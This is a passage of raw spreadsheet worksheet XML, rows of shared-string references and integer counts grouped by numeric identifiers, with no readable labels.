        <v>16221</v>
      </c>
      <c r="C12200">
        <v>29</v>
      </c>
      <c r="D12200">
        <v>1199</v>
      </c>
    </row>
    <row r="12201" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12201" t="s">
        <v>16230</v>
      </c>
      <c r="B12201" t="s">
        <v>16222</v>
      </c>
      <c r="C12201">
        <v>22</v>
      </c>
      <c r="D12201">
        <v>1199</v>
      </c>
    </row>
    <row r="12202" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12202" t="s">
        <v>16223</v>
      </c>
      <c r="B12202" t="s">
        <v>16223</v>
      </c>
      <c r="C12202">
        <v>0</v>
      </c>
      <c r="D12202">
        <v>1199</v>
      </c>
    </row>
    <row r="12203" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12203" t="s">
        <v>16224</v>
      </c>
      <c r="B12203" t="s">
        <v>16224</v>
      </c>
      <c r="C12203">
        <v>0</v>
      </c>
      <c r="D12203">
        <v>1199</v>
      </c>
    </row>
    <row r="12204" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12204" t="s">
        <v>16228</v>
      </c>
      <c r="B12204" t="s">
        <v>16211</v>
      </c>
      <c r="C12204">
        <v>0</v>
      </c>
      <c r="D12204">
        <v>5030</v>
      </c>
    </row>
    <row r="12205" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12205" t="s">
        <v>16231</v>
      </c>
      <c r="B12205" t="s">
        <v>16212</v>
      </c>
      <c r="C12205">
        <v>0</v>
      </c>
      <c r="D12205">
        <v>5030</v>
      </c>
    </row>
    <row r="12206" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12206" t="s">
        <v>16228</v>
      </c>
      <c r="B12206" t="s">
        <v>16213</v>
      </c>
      <c r="C12206">
        <v>0</v>
      </c>
      <c r="D12206">
        <v>5030</v>
      </c>
    </row>
    <row r="12207" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12207" t="s">
        <v>16231</v>
      </c>
      <c r="B12207" t="s">
        <v>16214</v>
      </c>
      <c r="C12207">
        <v>0</v>
      </c>
      <c r="D12207">
        <v>5030</v>
      </c>
    </row>
    <row r="12208" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12208" t="s">
        <v>16228</v>
      </c>
      <c r="B12208" t="s">
        <v>16215</v>
      </c>
      <c r="C12208">
        <v>1</v>
      </c>
      <c r="D12208">
        <v>5030</v>
      </c>
    </row>
    <row r="12209" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12209" t="s">
        <v>16231</v>
      </c>
      <c r="B12209" t="s">
        <v>16216</v>
      </c>
      <c r="C12209">
        <v>2</v>
      </c>
      <c r="D12209">
        <v>5030</v>
      </c>
    </row>
    <row r="12210" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12210" t="s">
        <v>16228</v>
      </c>
      <c r="B12210" t="s">
        <v>16217</v>
      </c>
      <c r="C12210">
        <v>1</v>
      </c>
      <c r="D12210">
        <v>5030</v>
      </c>
    </row>
    <row r="12211" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12211" t="s">
        <v>16231</v>
      </c>
      <c r="B12211" t="s">
        <v>16218</v>
      </c>
      <c r="C12211">
        <v>0</v>
      </c>
      <c r="D12211">
        <v>5030</v>
      </c>
    </row>
    <row r="12212" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12212" t="s">
        <v>16229</v>
      </c>
      <c r="B12212" t="s">
        <v>16219</v>
      </c>
      <c r="C12212">
        <v>1</v>
      </c>
      <c r="D12212">
        <v>5030</v>
      </c>
    </row>
    <row r="12213" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12213" t="s">
        <v>16230</v>
      </c>
      <c r="B12213" t="s">
        <v>16220</v>
      </c>
      <c r="C12213">
        <v>1</v>
      </c>
      <c r="D12213">
        <v>5030</v>
      </c>
    </row>
    <row r="12214" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12214" t="s">
        <v>16229</v>
      </c>
      <c r="B12214" t="s">
        <v>16221</v>
      </c>
      <c r="C12214">
        <v>1</v>
      </c>
      <c r="D12214">
        <v>5030</v>
      </c>
    </row>
    <row r="12215" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12215" t="s">
        <v>16230</v>
      </c>
      <c r="B12215" t="s">
        <v>16222</v>
      </c>
      <c r="C12215">
        <v>1</v>
      </c>
      <c r="D12215">
        <v>5030</v>
      </c>
    </row>
    <row r="12216" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12216" t="s">
        <v>16223</v>
      </c>
      <c r="B12216" t="s">
        <v>16223</v>
      </c>
      <c r="C12216">
        <v>0</v>
      </c>
      <c r="D12216">
        <v>5030</v>
      </c>
    </row>
    <row r="12217" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12217" t="s">
        <v>16224</v>
      </c>
      <c r="B12217" t="s">
        <v>16224</v>
      </c>
      <c r="C12217">
        <v>0</v>
      </c>
      <c r="D12217">
        <v>5030</v>
      </c>
    </row>
    <row r="12218" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12218" t="s">
        <v>16228</v>
      </c>
      <c r="B12218" t="s">
        <v>16211</v>
      </c>
      <c r="C12218">
        <v>0</v>
      </c>
      <c r="D12218">
        <v>1246</v>
      </c>
    </row>
    <row r="12219" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12219" t="s">
        <v>16231</v>
      </c>
      <c r="B12219" t="s">
        <v>16212</v>
      </c>
      <c r="C12219">
        <v>0</v>
      </c>
      <c r="D12219">
        <v>1246</v>
      </c>
    </row>
    <row r="12220" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12220" t="s">
        <v>16228</v>
      </c>
      <c r="B12220" t="s">
        <v>16213</v>
      </c>
      <c r="C12220">
        <v>0</v>
      </c>
      <c r="D12220">
        <v>1246</v>
      </c>
    </row>
    <row r="12221" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12221" t="s">
        <v>16231</v>
      </c>
      <c r="B12221" t="s">
        <v>16214</v>
      </c>
      <c r="C12221">
        <v>0</v>
      </c>
      <c r="D12221">
        <v>1246</v>
      </c>
    </row>
    <row r="12222" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12222" t="s">
        <v>16228</v>
      </c>
      <c r="B12222" t="s">
        <v>16215</v>
      </c>
      <c r="C12222">
        <v>0</v>
      </c>
      <c r="D12222">
        <v>1246</v>
      </c>
    </row>
    <row r="12223" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12223" t="s">
        <v>16231</v>
      </c>
      <c r="B12223" t="s">
        <v>16216</v>
      </c>
      <c r="C12223">
        <v>2</v>
      </c>
      <c r="D12223">
        <v>1246</v>
      </c>
    </row>
    <row r="12224" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12224" t="s">
        <v>16228</v>
      </c>
      <c r="B12224" t="s">
        <v>16217</v>
      </c>
      <c r="C12224">
        <v>5</v>
      </c>
      <c r="D12224">
        <v>1246</v>
      </c>
    </row>
    <row r="12225" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12225" t="s">
        <v>16231</v>
      </c>
      <c r="B12225" t="s">
        <v>16218</v>
      </c>
      <c r="C12225">
        <v>4</v>
      </c>
      <c r="D12225">
        <v>1246</v>
      </c>
    </row>
    <row r="12226" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12226" t="s">
        <v>16229</v>
      </c>
      <c r="B12226" t="s">
        <v>16219</v>
      </c>
      <c r="C12226">
        <v>0</v>
      </c>
      <c r="D12226">
        <v>1246</v>
      </c>
    </row>
    <row r="12227" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12227" t="s">
        <v>16230</v>
      </c>
      <c r="B12227" t="s">
        <v>16220</v>
      </c>
      <c r="C12227">
        <v>0</v>
      </c>
      <c r="D12227">
        <v>1246</v>
      </c>
    </row>
    <row r="12228" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12228" t="s">
        <v>16229</v>
      </c>
      <c r="B12228" t="s">
        <v>16221</v>
      </c>
      <c r="C12228">
        <v>44</v>
      </c>
      <c r="D12228">
        <v>1246</v>
      </c>
    </row>
    <row r="12229" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12229" t="s">
        <v>16230</v>
      </c>
      <c r="B12229" t="s">
        <v>16222</v>
      </c>
      <c r="C12229">
        <v>43</v>
      </c>
      <c r="D12229">
        <v>1246</v>
      </c>
    </row>
    <row r="12230" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12230" t="s">
        <v>16223</v>
      </c>
      <c r="B12230" t="s">
        <v>16223</v>
      </c>
      <c r="C12230">
        <v>30</v>
      </c>
      <c r="D12230">
        <v>1246</v>
      </c>
    </row>
    <row r="12231" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12231" t="s">
        <v>16224</v>
      </c>
      <c r="B12231" t="s">
        <v>16224</v>
      </c>
      <c r="C12231">
        <v>0</v>
      </c>
      <c r="D12231">
        <v>1246</v>
      </c>
    </row>
    <row r="12232" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12232" t="s">
        <v>16228</v>
      </c>
      <c r="B12232" t="s">
        <v>16211</v>
      </c>
      <c r="C12232">
        <v>0</v>
      </c>
      <c r="D12232">
        <v>486</v>
      </c>
    </row>
    <row r="12233" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12233" t="s">
        <v>16231</v>
      </c>
      <c r="B12233" t="s">
        <v>16212</v>
      </c>
      <c r="C12233">
        <v>0</v>
      </c>
      <c r="D12233">
        <v>486</v>
      </c>
    </row>
    <row r="12234" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12234" t="s">
        <v>16228</v>
      </c>
      <c r="B12234" t="s">
        <v>16213</v>
      </c>
      <c r="C12234">
        <v>0</v>
      </c>
      <c r="D12234">
        <v>486</v>
      </c>
    </row>
    <row r="12235" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12235" t="s">
        <v>16231</v>
      </c>
      <c r="B12235" t="s">
        <v>16214</v>
      </c>
      <c r="C12235">
        <v>0</v>
      </c>
      <c r="D12235">
        <v>486</v>
      </c>
    </row>
    <row r="12236" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12236" t="s">
        <v>16228</v>
      </c>
      <c r="B12236" t="s">
        <v>16215</v>
      </c>
      <c r="C12236">
        <v>0</v>
      </c>
      <c r="D12236">
        <v>486</v>
      </c>
    </row>
    <row r="12237" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12237" t="s">
        <v>16231</v>
      </c>
      <c r="B12237" t="s">
        <v>16216</v>
      </c>
      <c r="C12237">
        <v>10</v>
      </c>
      <c r="D12237">
        <v>486</v>
      </c>
    </row>
    <row r="12238" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12238" t="s">
        <v>16228</v>
      </c>
      <c r="B12238" t="s">
        <v>16217</v>
      </c>
      <c r="C12238">
        <v>10</v>
      </c>
      <c r="D12238">
        <v>486</v>
      </c>
    </row>
    <row r="12239" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12239" t="s">
        <v>16231</v>
      </c>
      <c r="B12239" t="s">
        <v>16218</v>
      </c>
      <c r="C12239">
        <v>14</v>
      </c>
      <c r="D12239">
        <v>486</v>
      </c>
    </row>
    <row r="12240" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12240" t="s">
        <v>16229</v>
      </c>
      <c r="B12240" t="s">
        <v>16219</v>
      </c>
      <c r="C12240">
        <v>0</v>
      </c>
      <c r="D12240">
        <v>486</v>
      </c>
    </row>
    <row r="12241" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12241" t="s">
        <v>16230</v>
      </c>
      <c r="B12241" t="s">
        <v>16220</v>
      </c>
      <c r="C12241">
        <v>0</v>
      </c>
      <c r="D12241">
        <v>486</v>
      </c>
    </row>
    <row r="12242" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12242" t="s">
        <v>16229</v>
      </c>
      <c r="B12242" t="s">
        <v>16221</v>
      </c>
      <c r="C12242">
        <v>111</v>
      </c>
      <c r="D12242">
        <v>486</v>
      </c>
    </row>
    <row r="12243" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12243" t="s">
        <v>16230</v>
      </c>
      <c r="B12243" t="s">
        <v>16222</v>
      </c>
      <c r="C12243">
        <v>246</v>
      </c>
      <c r="D12243">
        <v>486</v>
      </c>
    </row>
    <row r="12244" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12244" t="s">
        <v>16223</v>
      </c>
      <c r="B12244" t="s">
        <v>16223</v>
      </c>
      <c r="C12244">
        <v>0</v>
      </c>
      <c r="D12244">
        <v>486</v>
      </c>
    </row>
    <row r="12245" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12245" t="s">
        <v>16224</v>
      </c>
      <c r="B12245" t="s">
        <v>16224</v>
      </c>
      <c r="C12245">
        <v>0</v>
      </c>
      <c r="D12245">
        <v>486</v>
      </c>
    </row>
    <row r="12246" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12246" t="s">
        <v>16228</v>
      </c>
      <c r="B12246" t="s">
        <v>16211</v>
      </c>
      <c r="C12246">
        <v>2</v>
      </c>
      <c r="D12246">
        <v>974</v>
      </c>
    </row>
    <row r="12247" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12247" t="s">
        <v>16231</v>
      </c>
      <c r="B12247" t="s">
        <v>16212</v>
      </c>
      <c r="C12247">
        <v>1</v>
      </c>
      <c r="D12247">
        <v>974</v>
      </c>
    </row>
    <row r="12248" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12248" t="s">
        <v>16228</v>
      </c>
      <c r="B12248" t="s">
        <v>16213</v>
      </c>
      <c r="C12248">
        <v>14</v>
      </c>
      <c r="D12248">
        <v>974</v>
      </c>
    </row>
    <row r="12249" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12249" t="s">
        <v>16231</v>
      </c>
      <c r="B12249" t="s">
        <v>16214</v>
      </c>
      <c r="C12249">
        <v>2</v>
      </c>
      <c r="D12249">
        <v>974</v>
      </c>
    </row>
    <row r="12250" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12250" t="s">
        <v>16228</v>
      </c>
      <c r="B12250" t="s">
        <v>16215</v>
      </c>
      <c r="C12250">
        <v>2</v>
      </c>
      <c r="D12250">
        <v>974</v>
      </c>
    </row>
    <row r="12251" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12251" t="s">
        <v>16231</v>
      </c>
      <c r="B12251" t="s">
        <v>16216</v>
      </c>
      <c r="C12251">
        <v>1</v>
      </c>
      <c r="D12251">
        <v>974</v>
      </c>
    </row>
    <row r="12252" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12252" t="s">
        <v>16228</v>
      </c>
      <c r="B12252" t="s">
        <v>16217</v>
      </c>
      <c r="C12252">
        <v>14</v>
      </c>
      <c r="D12252">
        <v>974</v>
      </c>
    </row>
    <row r="12253" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12253" t="s">
        <v>16231</v>
      </c>
      <c r="B12253" t="s">
        <v>16218</v>
      </c>
      <c r="C12253">
        <v>2</v>
      </c>
      <c r="D12253">
        <v>974</v>
      </c>
    </row>
    <row r="12254" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12254" t="s">
        <v>16229</v>
      </c>
      <c r="B12254" t="s">
        <v>16219</v>
      </c>
      <c r="C12254">
        <v>0</v>
      </c>
      <c r="D12254">
        <v>974</v>
      </c>
    </row>
    <row r="12255" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12255" t="s">
        <v>16230</v>
      </c>
      <c r="B12255" t="s">
        <v>16220</v>
      </c>
      <c r="C12255">
        <v>0</v>
      </c>
      <c r="D12255">
        <v>974</v>
      </c>
    </row>
    <row r="12256" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12256" t="s">
        <v>16229</v>
      </c>
      <c r="B12256" t="s">
        <v>16221</v>
      </c>
      <c r="C12256">
        <v>0</v>
      </c>
      <c r="D12256">
        <v>974</v>
      </c>
    </row>
    <row r="12257" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12257" t="s">
        <v>16230</v>
      </c>
      <c r="B12257" t="s">
        <v>16222</v>
      </c>
      <c r="C12257">
        <v>0</v>
      </c>
      <c r="D12257">
        <v>974</v>
      </c>
    </row>
    <row r="12258" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12258" t="s">
        <v>16223</v>
      </c>
      <c r="B12258" t="s">
        <v>16223</v>
      </c>
      <c r="C12258">
        <v>25</v>
      </c>
      <c r="D12258">
        <v>974</v>
      </c>
    </row>
    <row r="12259" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12259" t="s">
        <v>16224</v>
      </c>
      <c r="B12259" t="s">
        <v>16224</v>
      </c>
      <c r="C12259">
        <v>1</v>
      </c>
      <c r="D12259">
        <v>974</v>
      </c>
    </row>
    <row r="12260" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12260" t="s">
        <v>16228</v>
      </c>
      <c r="B12260" t="s">
        <v>16211</v>
      </c>
      <c r="C12260">
        <v>0</v>
      </c>
      <c r="D12260">
        <v>4827</v>
      </c>
    </row>
    <row r="12261" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12261" t="s">
        <v>16231</v>
      </c>
      <c r="B12261" t="s">
        <v>16212</v>
      </c>
      <c r="C12261">
        <v>0</v>
      </c>
      <c r="D12261">
        <v>4827</v>
      </c>
    </row>
    <row r="12262" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12262" t="s">
        <v>16228</v>
      </c>
      <c r="B12262" t="s">
        <v>16213</v>
      </c>
      <c r="C12262">
        <v>0</v>
      </c>
      <c r="D12262">
        <v>4827</v>
      </c>
    </row>
    <row r="12263" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12263" t="s">
        <v>16231</v>
      </c>
      <c r="B12263" t="s">
        <v>16214</v>
      </c>
      <c r="C12263">
        <v>0</v>
      </c>
      <c r="D12263">
        <v>4827</v>
      </c>
    </row>
    <row r="12264" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12264" t="s">
        <v>16228</v>
      </c>
      <c r="B12264" t="s">
        <v>16215</v>
      </c>
      <c r="C12264">
        <v>0</v>
      </c>
      <c r="D12264">
        <v>4827</v>
      </c>
    </row>
    <row r="12265" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12265" t="s">
        <v>16231</v>
      </c>
      <c r="B12265" t="s">
        <v>16216</v>
      </c>
      <c r="C12265">
        <v>1</v>
      </c>
      <c r="D12265">
        <v>4827</v>
      </c>
    </row>
    <row r="12266" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12266" t="s">
        <v>16228</v>
      </c>
      <c r="B12266" t="s">
        <v>16217</v>
      </c>
      <c r="C12266">
        <v>1</v>
      </c>
      <c r="D12266">
        <v>4827</v>
      </c>
    </row>
    <row r="12267" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12267" t="s">
        <v>16231</v>
      </c>
      <c r="B12267" t="s">
        <v>16218</v>
      </c>
      <c r="C12267">
        <v>2</v>
      </c>
      <c r="D12267">
        <v>4827</v>
      </c>
    </row>
    <row r="12268" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12268" t="s">
        <v>16229</v>
      </c>
      <c r="B12268" t="s">
        <v>16219</v>
      </c>
      <c r="C12268">
        <v>0</v>
      </c>
      <c r="D12268">
        <v>4827</v>
      </c>
    </row>
    <row r="12269" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12269" t="s">
        <v>16230</v>
      </c>
      <c r="B12269" t="s">
        <v>16220</v>
      </c>
      <c r="C12269">
        <v>0</v>
      </c>
      <c r="D12269">
        <v>4827</v>
      </c>
    </row>
    <row r="12270" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12270" t="s">
        <v>16229</v>
      </c>
      <c r="B12270" t="s">
        <v>16221</v>
      </c>
      <c r="C12270">
        <v>0</v>
      </c>
      <c r="D12270">
        <v>4827</v>
      </c>
    </row>
    <row r="12271" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12271" t="s">
        <v>16230</v>
      </c>
      <c r="B12271" t="s">
        <v>16222</v>
      </c>
      <c r="C12271">
        <v>0</v>
      </c>
      <c r="D12271">
        <v>4827</v>
      </c>
    </row>
    <row r="12272" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12272" t="s">
        <v>16223</v>
      </c>
      <c r="B12272" t="s">
        <v>16223</v>
      </c>
      <c r="C12272">
        <v>26</v>
      </c>
      <c r="D12272">
        <v>4827</v>
      </c>
    </row>
    <row r="12273" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12273" t="s">
        <v>16224</v>
      </c>
      <c r="B12273" t="s">
        <v>16224</v>
      </c>
      <c r="C12273">
        <v>1</v>
      </c>
      <c r="D12273">
        <v>4827</v>
      </c>
    </row>
    <row r="12274" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12274" t="s">
        <v>16228</v>
      </c>
      <c r="B12274" t="s">
        <v>16211</v>
      </c>
      <c r="C12274">
        <v>0</v>
      </c>
      <c r="D12274">
        <v>1999</v>
      </c>
    </row>
    <row r="12275" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12275" t="s">
        <v>16231</v>
      </c>
      <c r="B12275" t="s">
        <v>16212</v>
      </c>
      <c r="C12275">
        <v>0</v>
      </c>
      <c r="D12275">
        <v>1999</v>
      </c>
    </row>
    <row r="12276" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12276" t="s">
        <v>16228</v>
      </c>
      <c r="B12276" t="s">
        <v>16213</v>
      </c>
      <c r="C12276">
        <v>0</v>
      </c>
      <c r="D12276">
        <v>1999</v>
      </c>
    </row>
    <row r="12277" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12277" t="s">
        <v>16231</v>
      </c>
      <c r="B12277" t="s">
        <v>16214</v>
      </c>
      <c r="C12277">
        <v>0</v>
      </c>
      <c r="D12277">
        <v>1999</v>
      </c>
    </row>
    <row r="12278" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12278" t="s">
        <v>16228</v>
      </c>
      <c r="B12278" t="s">
        <v>16215</v>
      </c>
      <c r="C12278">
        <v>0</v>
      </c>
      <c r="D12278">
        <v>1999</v>
      </c>
    </row>
    <row r="12279" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12279" t="s">
        <v>16231</v>
      </c>
      <c r="B12279" t="s">
        <v>16216</v>
      </c>
      <c r="C12279">
        <v>20</v>
      </c>
      <c r="D12279">
        <v>1999</v>
      </c>
    </row>
    <row r="12280" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12280" t="s">
        <v>16228</v>
      </c>
      <c r="B12280" t="s">
        <v>16217</v>
      </c>
      <c r="C12280">
        <v>50</v>
      </c>
      <c r="D12280">
        <v>1999</v>
      </c>
    </row>
    <row r="12281" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12281" t="s">
        <v>16231</v>
      </c>
      <c r="B12281" t="s">
        <v>16218</v>
      </c>
      <c r="C12281">
        <v>130</v>
      </c>
      <c r="D12281">
        <v>1999</v>
      </c>
    </row>
    <row r="12282" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12282" t="s">
        <v>16229</v>
      </c>
      <c r="B12282" t="s">
        <v>16219</v>
      </c>
      <c r="C12282">
        <v>0</v>
      </c>
      <c r="D12282">
        <v>1999</v>
      </c>
    </row>
    <row r="12283" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12283" t="s">
        <v>16230</v>
      </c>
      <c r="B12283" t="s">
        <v>16220</v>
      </c>
      <c r="C12283">
        <v>50</v>
      </c>
      <c r="D12283">
        <v>1999</v>
      </c>
    </row>
    <row r="12284" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12284" t="s">
        <v>16229</v>
      </c>
      <c r="B12284" t="s">
        <v>16221</v>
      </c>
      <c r="C12284">
        <v>56</v>
      </c>
      <c r="D12284">
        <v>1999</v>
      </c>
    </row>
    <row r="12285" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12285" t="s">
        <v>16230</v>
      </c>
      <c r="B12285" t="s">
        <v>16222</v>
      </c>
      <c r="C12285">
        <v>174</v>
      </c>
      <c r="D12285">
        <v>1999</v>
      </c>
    </row>
    <row r="12286" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12286" t="s">
        <v>16223</v>
      </c>
      <c r="B12286" t="s">
        <v>16223</v>
      </c>
      <c r="C12286">
        <v>25</v>
      </c>
      <c r="D12286">
        <v>1999</v>
      </c>
    </row>
    <row r="12287" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12287" t="s">
        <v>16224</v>
      </c>
      <c r="B12287" t="s">
        <v>16224</v>
      </c>
      <c r="C12287">
        <v>2</v>
      </c>
      <c r="D12287">
        <v>1999</v>
      </c>
    </row>
    <row r="12288" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12288" t="s">
        <v>16228</v>
      </c>
      <c r="B12288" t="s">
        <v>16211</v>
      </c>
      <c r="C12288">
        <v>0</v>
      </c>
      <c r="D12288">
        <v>600</v>
      </c>
    </row>
    <row r="12289" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12289" t="s">
        <v>16231</v>
      </c>
      <c r="B12289" t="s">
        <v>16212</v>
      </c>
      <c r="C12289">
        <v>0</v>
      </c>
      <c r="D12289">
        <v>600</v>
      </c>
    </row>
    <row r="12290" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12290" t="s">
        <v>16228</v>
      </c>
      <c r="B12290" t="s">
        <v>16213</v>
      </c>
      <c r="C12290">
        <v>0</v>
      </c>
      <c r="D12290">
        <v>600</v>
      </c>
    </row>
    <row r="12291" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12291" t="s">
        <v>16231</v>
      </c>
      <c r="B12291" t="s">
        <v>16214</v>
      </c>
      <c r="C12291">
        <v>0</v>
      </c>
      <c r="D12291">
        <v>600</v>
      </c>
    </row>
    <row r="12292" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12292" t="s">
        <v>16228</v>
      </c>
      <c r="B12292" t="s">
        <v>16215</v>
      </c>
      <c r="C12292">
        <v>2</v>
      </c>
      <c r="D12292">
        <v>600</v>
      </c>
    </row>
    <row r="12293" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12293" t="s">
        <v>16231</v>
      </c>
      <c r="B12293" t="s">
        <v>16216</v>
      </c>
      <c r="C12293">
        <v>1</v>
      </c>
      <c r="D12293">
        <v>600</v>
      </c>
    </row>
    <row r="12294" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12294" t="s">
        <v>16228</v>
      </c>
      <c r="B12294" t="s">
        <v>16217</v>
      </c>
      <c r="C12294">
        <v>1</v>
      </c>
      <c r="D12294">
        <v>600</v>
      </c>
    </row>
    <row r="12295" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12295" t="s">
        <v>16231</v>
      </c>
      <c r="B12295" t="s">
        <v>16218</v>
      </c>
      <c r="C12295">
        <v>0</v>
      </c>
      <c r="D12295">
        <v>600</v>
      </c>
    </row>
    <row r="12296" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12296" t="s">
        <v>16229</v>
      </c>
      <c r="B12296" t="s">
        <v>16219</v>
      </c>
      <c r="C12296">
        <v>18</v>
      </c>
      <c r="D12296">
        <v>600</v>
      </c>
    </row>
    <row r="12297" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12297" t="s">
        <v>16230</v>
      </c>
      <c r="B12297" t="s">
        <v>16220</v>
      </c>
      <c r="C12297">
        <v>4</v>
      </c>
      <c r="D12297">
        <v>600</v>
      </c>
    </row>
    <row r="12298" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12298" t="s">
        <v>16229</v>
      </c>
      <c r="B12298" t="s">
        <v>16221</v>
      </c>
      <c r="C12298">
        <v>1</v>
      </c>
      <c r="D12298">
        <v>600</v>
      </c>
    </row>
    <row r="12299" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12299" t="s">
        <v>16230</v>
      </c>
      <c r="B12299" t="s">
        <v>16222</v>
      </c>
      <c r="C12299">
        <v>145</v>
      </c>
      <c r="D12299">
        <v>600</v>
      </c>
    </row>
    <row r="12300" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12300" t="s">
        <v>16223</v>
      </c>
      <c r="B12300" t="s">
        <v>16223</v>
      </c>
      <c r="C12300">
        <v>25</v>
      </c>
      <c r="D12300">
        <v>600</v>
      </c>
    </row>
    <row r="12301" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12301" t="s">
        <v>16224</v>
      </c>
      <c r="B12301" t="s">
        <v>16224</v>
      </c>
      <c r="C12301">
        <v>1</v>
      </c>
      <c r="D12301">
        <v>600</v>
      </c>
    </row>
    <row r="12302" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12302" t="s">
        <v>16228</v>
      </c>
      <c r="B12302" t="s">
        <v>16211</v>
      </c>
      <c r="C12302">
        <v>0</v>
      </c>
      <c r="D12302">
        <v>1035</v>
      </c>
    </row>
    <row r="12303" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12303" t="s">
        <v>16231</v>
      </c>
      <c r="B12303" t="s">
        <v>16212</v>
      </c>
      <c r="C12303">
        <v>1</v>
      </c>
      <c r="D12303">
        <v>1035</v>
      </c>
    </row>
    <row r="12304" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12304" t="s">
        <v>16228</v>
      </c>
      <c r="B12304" t="s">
        <v>16213</v>
      </c>
      <c r="C12304">
        <v>0</v>
      </c>
      <c r="D12304">
        <v>1035</v>
      </c>
    </row>
    <row r="12305" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A12305" t="s">
        <v>16231</v>
      </c>
      <c r="B12305" t="s">
        <v>16214</v>
      </c>
      <c r="C12305">
